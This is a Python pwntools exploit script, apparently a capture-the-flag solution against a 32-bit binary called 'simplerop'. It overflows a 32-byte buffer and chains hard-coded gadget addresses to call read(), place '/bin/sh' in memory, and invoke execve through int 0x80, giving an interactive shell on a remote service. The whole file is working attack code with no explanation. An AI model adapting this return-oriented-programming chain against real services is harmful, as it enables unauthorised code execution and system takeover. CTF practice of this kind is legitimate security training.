from pwn import *
from LibcSearcher import *

context(os='linux',arch='i386',log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']

io = remote('192.168.95.133',10001)
# io = process('./simplerop')
# io = remote('node4.buuoj.cn',27004)

elf = ELF('./simplerop')
pause()

int_0x80_add = 0x080493e1
pop_eax_ret = 0x080bae06
pop_edx_ecx_ebx_ret = 0x0806e850
read_fun_addr = 0x0806CD50
str_binsh_addr = 0x080EA0A6
data2_addr = 0x080EA0C2

pop_esi_edi__ebp_ret=0x0804838c

main_addr = elf.symbols["main"]


io.recvuntil(b"Your input :")



payload = flat(b"A"*32, read_fun_addr,pop_edx_ecx_ebx_ret, 0x0,str_binsh_addr,8)
payload += flat(pop_eax_ret, 11, pop_edx_ecx_ebx_ret, 0x0, 0x0, str_binsh_addr,int_0x80_add)


# payload = flat(b"A"*32, read_fun_addr,pop_esi_edi__ebp_ret, 0x0,str_binsh_addr,8)
# payload += flat(read_fun_addr,main_addr, 0x0,data2_addr,8)

# pause()
io.sendline(payload)
# pause()
# io.sendline(b"aaaaaaaa")
io.sendline(b"/bin/sh\x00")
io.interactive()